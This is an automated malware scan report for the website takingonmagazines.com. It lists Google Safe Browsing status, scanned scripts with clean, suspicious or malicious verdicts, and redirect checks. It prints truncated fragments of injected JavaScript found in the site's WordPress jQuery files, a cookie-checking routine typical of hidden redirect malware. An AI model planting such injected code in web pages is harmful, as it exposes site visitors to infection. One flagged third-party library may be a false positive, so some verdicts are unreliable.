Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=takingonmagazines.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.takingonmagazines.com/ | 200 OK Content-Length: 65017 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.bloglovin.com <!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#"> <head><meta name="justapinch" content="nopinch" /> <!-- YrH7eDiOxtQ9bmA2WZFnXDGTbd4 --> <link href='http://fonts.googleapis.com/css?family=Dosis:300,400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Advent+Pro' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis ...[4158 bytes skipped]... | ||
http://www.takingonmagazines.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96696 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( jQuery.noConflict(); Antivirus reports:
| ||
http://www.takingonmagazines.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8089 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://www.takingonmagazines.com/wp-content/plugins/popular-posts-tab-widget-for-jetpack/tab.js?ver=4.0 | 200 OK Content-Length: 2931 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 145774 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof(stlib)=="undefined"){var stlib={}}if(!stlib.functions){stlib.functions=[];stlib.functionCount=0}stlib.global={};stlib.global.hash=document.location.href.split("#");stlib.global.hash.shift();stlib.global.hash=stlib.global.hash.join("#");stlib.dynamicOn=true;stlib.debugOn=false;stlib.debug={count:0,messages:[],debug:function(b,a){if(a&&(typeof console)!="undefined"){console.log(b)}stlib.debug.messages.push(b)},show:function(a){for(message in stlib.debug.messages){if((typeof conso Antivirus reports:
| ||
https://wprp.zemanta.com/static/js/loader.js?version=3.5.1 | 200 OK Content-Length: 11783 Content-Type: application/javascript | clean |
http://c520866.r66.cf2.rackcdn.com/1/js/easy_rotator.min.js | 200 OK Content-Length: 155522 Content-Type: application/javascript | clean |
http://o.aolcdn.com/ads/adsWrapper3.js | 200 OK Content-Length: 9594 Content-Type: application/javascript | clean |
https://s3.amazonaws.com/cgc-badge-v2/load.min.js | 200 OK Content-Length: 1342 Content-Type: application/x-javascript | clean |
https://s3.amazonaws.com/cgc-badge-v2/common.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://badge.clevergirlscollective.com/v2/Cq4LE8PvEaqH1q3Trq2P861ZS3eDXK4T.js | 200 OK Content-Length: 291 Content-Type: application/javascript | clean |
http://ardrone.swoop.com/js/spxw.js | HTTP/1.1 302 Found Cache-Control: public, max-age=60 Connection: Close Date: Sat, 20 Sep 2014 12:01:36 GMT Location: http://d20knrsyadwlc4.cloudfront.net/c/js/spxw-338e5f36cafd3c4cbb7c8c0772630c53.js Server: Jetty(9.1.0.M0) Content-Length: 0 Expires: Sat, 20 Sep 2014 12:02:36 GMT Access-Control-Allow-Origin: * P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" | clean |
http://d20knrsyadwlc4.cloudfront.net/c/js/spxw-338e5f36cafd3c4cbb7c8c0772630c53.js | 200 OK Content-Length: 2773 Content-Type: application/x-javascript | clean |
http://www.takingonmagazines.com//assets.pinterest.com/js/pinit.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 20 Sep 2014 12:01:36 GMT Pragma: no-cache Location: http://www.takingonmagazines.com/assets.pinterest.com/js/pinit.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: kpg_stop_spammers_time=1411214497; expires=Sat, 20-Sep-2014 12:02:37 GMT X-Pingback: http://www.takingonmagazines.com/xmlrpc.php | clean |
http://www.takingonmagazines.com/assets.pinterest.com/js/pinit.js/ | 404 Not Found Content-Length: 30843 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.bloglovin.com <!DOCTYPE html>
<html lang="en-US" prefix="og: http://ogp.me/ns#"> <head><meta name="justapinch" content="nopinch" /> <!-- YrH7eDiOxtQ9bmA2WZFnXDGTbd4 --> <link href='http://fonts.googleapis.com/css?family=Dosis:300,400' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Advent+Pro' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis ...[4171 bytes skipped]... | ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: takingonmagazines.com
Result:
GET / HTTP/1.1
Host: takingonmagazines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: takingonmagazines.com
Referer: http://www.google.com/search?q=takingonmagazines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: takingonmagazines.com
Referer: http://www.google.com/search?q=takingonmagazines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.